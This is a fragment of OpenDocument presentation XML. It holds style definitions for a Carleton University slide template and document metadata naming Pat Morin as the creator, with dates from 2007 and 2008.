    <style:style style:name="Carleton_25_20U-notes" style:display-name="Carleton%20U-notes" style:family="presentation">
      <style:graphic-properties draw:stroke="none" draw:fill="none">
        <text:list-style style:name="Carleton_5f_25_5f_20U-notes" style:display-name="Carleton_25_20U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5_20U-outline1" style:display-name="Carleton%20U-outline1" style:family="presentation">
      <style:graphic-properties draw:stroke="none" draw:fill="none">
        <text:list-style style:name="Carleton_5f_25_5f_20U-outline1" style:display-name="Carleton_25_20U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5_20U-outline2" style:display-name="Carleton%20U-outline2" style:family="presentation" style:parent-style-name="Carleton_25_20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3" style:display-name="Carleton%20U-outline3" style:family="presentation" style:parent-style-name="Carleton_25_20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4" style:display-name="Carleton%20U-outline4" style:family="presentation" style:parent-style-name="Carleton_25_20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5" style:display-name="Carleton%20U-outline5" style:family="presentation" style:parent-style-name="Carleton_25_20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6" style:display-name="Carleton%20U-outline6" style:family="presentation" style:parent-style-name="Carleton_25_20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7" style:display-name="Carleton%20U-outline7" style:family="presentation" style:parent-style-name="Carleton_25_20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8" style:display-name="Carleton%20U-outline8" style:family="presentation" style:parent-style-name="Carleton_25_20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9" style:display-name="Carleton%20U-outline9" style:family="presentation" style:parent-style-name="Carleton_25_20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5_20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5_20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5_20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5_20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5_20U" style:display-name="Carleton%20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5_20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5_20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5_20U-title" draw:layer="backgroundobjects" svg:width="12.7cm" svg:height="9.526cm" svg:x="3.175cm" svg:y="1.904cm" presentation:class="page"/>
        <draw:frame presentation:style-name="Carleton_25_20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Pat Morin</meta:initial-creator>
    <meta:creation-date>2007-03-21T14:22:54</meta:creation-date>
    <dc:creator>Pat Morin</dc:creator>
    <dc:date>2008-03-25T07:33:50</dc:date>
    <meta:editing-cycles>167</meta:editing-cycles>
    <meta:editing-duration>P1DT13H39M51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